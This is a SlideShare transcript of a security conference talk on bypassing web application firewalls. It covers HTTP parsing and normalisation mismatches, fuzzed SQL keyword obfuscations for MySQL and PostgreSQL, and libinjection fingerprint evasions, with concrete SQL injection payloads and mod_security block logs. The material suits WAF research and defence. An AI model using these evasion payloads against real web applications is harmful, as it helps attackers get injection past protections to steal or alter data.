SlideShare une entreprise Scribd logo

Lie to Me: Bypassing Modern Web Application Firewalls

Ivan Novikov
Ivan Novikov

The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.

Technologie
1  sur  38
Télécharger pour lire hors ligne
bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Protocol level bug looks like abyss
Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Data normalization level bug looks like tunnel
Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: union select 123
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Detection logic bug looks like ninja
Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
Time to exploit! • mod_security • libinjection • others?
mod_security • CRS (https://github.com/SpiderLabs/owasp- modsecurity-crs) • base_rules • many regular expressions
mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Abraham Aranguren
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
XSS
XSSXSS
XSS
Hrishikesh Mishra
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013Pentesting like a grandmaster BSides London 2013
Pentesting like a grandmaster BSides London 2013
Abraham Aranguren
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
XSS
XSSXSS
XSS
Hrishikesh Mishra
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
Neelu Tripathy
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Security in NodeJS applications
Security in NodeJS applicationsSecurity in NodeJS applications
Security in NodeJS applications
Daniel Garcia (a.k.a cr0hn)
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
Paul Ionescu
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
Sam Thomas
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
Joe McCray
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
Siddharth Bezalwar
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4hackers.com
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)
Ivan Novikov
 

Contenu connexe

Tendances

BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 

Tendances (20)

Pentesting GraphQL Applications
Pentesting GraphQL ApplicationsPentesting GraphQL Applications
Pentesting GraphQL Applications
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Security in NodeJS applications
Security in NodeJS applicationsSecurity in NodeJS applications
Security in NodeJS applications
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Secure coding in C#
Secure coding in C#Secure coding in C#
Secure coding in C#
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 

En vedette

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
Ivan Novikov
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testing
navajanegra
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
OWASP Russia
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
OWASP Russia
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
OWASP Russia
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection
Moabi.com
 

En vedette (20)

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
DNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmapDNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmap
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testing
 
Proactive approach
Proactive approachProactive approach
Proactive approach
 
Методы разработки качественного и чистого кода
Методы разработки качественного и чистого кодаМетоды разработки качественного и чистого кода
Методы разработки качественного и чистого кода
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection
 

Similaire à Lie to Me: Bypassing Modern Web Application Firewalls

Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014
Barney Hanlon
 

Similaire à Lie to Me: Bypassing Modern Web Application Firewalls (20)

Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
 
ELK stack at weibo.com
ELK stack at weibo.comELK stack at weibo.com
ELK stack at weibo.com
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
 
JSLT: JSON querying and transformation
JSLT: JSON querying and transformationJSLT: JSON querying and transformation
JSLT: JSON querying and transformation
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
 
Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Don't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesDon't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax Trees
 
Fosdem10
Fosdem10Fosdem10
Fosdem10
 
Solr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene EuroconSolr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene Eurocon
 
A guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwareA guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol software
 
ETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetup
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
Angular2 for Beginners
Angular2 for BeginnersAngular2 for Beginners
Angular2 for Beginners
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 

Dernier

A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Dernier (20)

[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
A Year of the Servo Reboot: Where Are We Now?
